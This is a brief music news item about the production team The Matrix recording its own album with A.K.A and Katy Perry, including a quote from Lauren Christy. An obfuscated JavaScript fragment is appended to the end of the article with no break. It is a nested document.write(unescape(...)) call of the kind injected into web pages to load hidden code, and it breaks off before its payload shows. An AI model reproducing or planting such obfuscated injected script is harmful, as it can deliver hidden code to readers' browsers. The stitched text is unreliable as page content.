Top producers The Matrix will release their own album later this year.
The team, behind albums by Britney Spears, David Bowie, and Avril Lavigne, have already completed half the album.
The Matrix's original members Lauren Christy, Graham Edwards and Scott Spock, have pulled in another two singer/ songwriters for the album, A.K.A and Katy Perry, reports Undercover Media.
"Basically our favourite things is to write songs, produce and be behind-the-scenes," explained Christy. "But (Columbia A&R exec) Tim Devine offered us the opportunity to make our own record, and it seemed like a fabulous situation. We embrace any chance to be creative. This was the perfect outlet for us to do our own music."document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
